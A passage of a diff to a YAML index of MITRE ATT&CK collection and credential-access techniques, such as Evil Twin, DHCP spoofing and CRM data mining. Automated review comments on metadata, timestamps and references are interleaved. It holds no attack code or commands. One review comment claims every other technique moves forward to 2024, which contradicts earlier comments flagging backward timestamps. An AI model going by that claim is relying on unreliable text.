+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
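Review bot: x_mitre_detection is an empty string for the new T1557.004 entry, so any consumer that renders detection guidance shows nothing for Evil Twin; the two data sources (Network Traffic Content and Network Traffic Flow) are the only detection hint the object carries. That is upstream ATT&CK content and should not be hand-edited in this file, but it is worth tracking as a gap. Two things to verify in the parse rather than the text: the citation key (Citation: Australia ‘Evil Twin’) is split across a line break inside a double-quoted scalar, which YAML folds to a single space, so it still equals the source_name 'Australia ‘Evil Twin’' including the curly quotes; and the 'may able to monitor' wording in the description is upstream text as well. atomic_tests: [] with no identifier: key is consistent with the other test-less entries in this file.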
@@ -39959,7 +40520,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -39989,8 +40550,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
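Review bot: T1602.002 drops spec_version and x_mitre_attack_spec_version: 2.1.0 with no 3.2.0 line visible in either of its hunks (the same situation as T1114.001); confirm the key is present elsewhere in the object, since every other object in this patch that loses 2.1.0 and is fully visible gets 3.2.0 in return.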
@@ -40044,7 +40603,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40081,7 +40639,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40109,12 +40667,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
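Review bot: same check for T1185: both spec-version keys are removed and no x_mitre_attack_spec_version replacement is visible in this hunk or the previous one for this object, so confirm it exists outside the context window. The T1557.003 modified bump below is backed by real changes (a reference URL and the spec-version bump) in the following hunks, so that one is fine.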
@@ -40151,23 +40707,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
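Review bot: nothing semantic changes for T1557.003 in this hunk; every moved key (x_mitre_contributors, x_mitre_deprecated, x_mitre_domains, x_mitre_is_subtechnique) keeps its value and x_mitre_version stays at '1.1', which is consistent because the only substantive update to this object is the reference URL in the next hunk. No action needed beyond pinning key order in the generator.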
@@ -40200,21 +40756,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
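Review bot: this is the one archive-URL swap in the patch that also updates the retrieval date ('March 7, 2022' -> 'September 12, 2024', snapshot 20231202025258 in the URL), which is the right way to record that the citation was re-verified against the archive; the DarkWatchman and M-Trends URL changes earlier in the patch keep their original retrieval dates and should follow this pattern. The T1557.003 x_mitre_attack_spec_version bump 2.1.0 -> 3.2.0 with x_mitre_version unchanged is consistent. T1557.001's modified value regresses from 2023-04-25 to 2022-10-25, which needs the same confirmation as T1114.001.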
@@ -40322,12 +40877,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40338,13 +40892,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -40358,6 +40912,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -40368,12 +40923,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
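Review bot: T1125's modified value regresses from 2023-10-31 to 2023-03-30 in the same hunk where T1056.003 clearly moves forward (x_mitre_attack_spec_version 3.1.0 -> 3.2.0, x_mitre_modified_by_ref re-added), so the regressions in this patch are not explained simply by an older bundle being used throughout; please confirm the source of the T1125 object before merging.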
@@ -40418,30 +40973,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -40451,31 +40987,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
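Review bot: dropping `x_mitre_permissions_required` (`- User`) and `spec_version: '2.1'` from T1213.001 changes the object's shape, not just its key order, so anything that reads this YAML (index generation, rendering of technique metadata) should be checked for tolerating those keys being absent. The same two fields are removed from T1056 later in this patch, while `x_mitre_permissions_required: Administrator` is left in place on T1602.001, so the removal is not applied uniformly across the file.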
@@ -40508,10 +41061,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -40520,16 +41075,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
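Review bot: replacing the `Office 365` and `Google Workspace` platforms with `Office Suite` on T1114.003 (and, further down, on T1114.002 and T1213) changes which per-platform index files these techniques belong in; the platform index CSVs should be regenerated from the same data in this change, otherwise the techniques drop out of the Office 365 and Google Workspace indexes without an Office Suite index picking them up. The added `Cloud Service: Cloud Service Metadata` data source is consistent with the cloud-side detection guidance already in `x_mitre_detection` above.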
@@ -40561,70 +41117,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
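Review bot: nearly all of this hunk is key reordering of T1074 and the one substantive change is easy to miss: the `Mandiant M-Trends 2020` reference URL moves from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, with the `Retrieved April 24, 2020.` text left unchanged. It is worth confirming the new link resolves, and, if the generator that emits this file can pin its key order (`modified`, `name`, `description`, `kill_chain_phases`, ... as in the new version), doing so would keep future diffs reviewable instead of rewriting every object.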
@@ -40697,7 +41249,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -40752,12 +41303,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -40769,6 +41319,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -40776,11 +41329,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -40797,14 +41350,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -40820,6 +41370,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -40828,13 +41379,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -40842,15 +41393,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -40861,9 +41408,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
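Review bot: the new T1213.004 object carries `x_mitre_detection: ''` while listing two data sources (`Logon Session: Logon Session Creation`, `Application Log: Application Log Content`), so any consumer that renders the detection field will show it blank for this technique. Confirm this mirrors the upstream ATT&CK entry rather than a field the generator failed to populate; if upstream really has no detection text, emitting the key as an empty string versus omitting it should at least match how the other objects in this file are handled.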
@@ -40909,7 +41507,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
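Review bot: the `modified` timestamp for T1557.002 goes backwards here, from `2022-11-08T14:00:00.188Z` to `2022-07-22T18:37:22.176Z`, whereas every other technique in this patch moves forward to a 2024 date. Together with this object keeping `x_mitre_attack_spec_version: 2.1.0` in the following hunk, that suggests it was regenerated from a different (older) ATT&CK bundle than its neighbours; the source of the data for this object should be checked before merging so the file does not mix bundle versions.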
@@ -40928,37 +41526,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
